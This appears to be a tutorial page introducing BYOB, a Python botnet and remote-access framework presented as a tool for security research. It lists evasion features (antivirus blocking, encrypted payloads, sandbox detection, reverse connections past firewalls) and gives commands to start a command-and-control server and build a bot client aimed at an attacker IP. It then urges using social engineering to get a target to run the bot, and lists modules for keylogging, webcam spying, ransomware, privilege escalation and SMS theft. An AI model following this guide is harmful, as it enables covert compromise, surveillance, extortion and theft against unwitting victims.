BYOB provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats. It is designed to allow developers to easily implement their own code and add cool new features without having to write a RAT or Command & Control server from scratch.
Nothing Written To The Disk − clients never write anything to the disk - not even temporary files because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process.
Platform Independent − everything is written in Python and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application.
Bypass Firewalls − clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections.
Counter-Measure Against Antivirus − avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning.
Encrypt Payloads To Prevent Analysis − the main client payload is encrypted with a random 256- bit key which exists solely in the payload stager which is generated along with it.
Prevent Reverse-Engineering − by default, clients will abort execution if a virtual machine or sandbox is detected.
git clone https://github.com/malwaredllc/byob.git
pip install -r requirements.txt
Here two terminals will be used; first terminal will be Bot Server where sessions will be handled and second terminal the Bot Client where bots will be created.
python server.py –port 445
Then open another linux terminal and Type cd /home/cybersecurity/Downloads/byob/byob
python client.py –name testbot.py 192.168.1.10(attacker ip) 445
After executing the above query, a new botnet will be created. The above query will execute. Now, you can use any social engineering trick anyone to open bot in their computer. When the testbot.py executed in the target machine, a session will be created in botnet server.
Post-exploitation modules those are remotely importable by clients after the successful configuration of botnet in the victim.
Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered
Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop
Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment
Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
Persistence (byob.modules.persistence): establish persistence on the host machine
Phone (byob.modules.phone): read/search/upload text messages from the client smartphone
Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host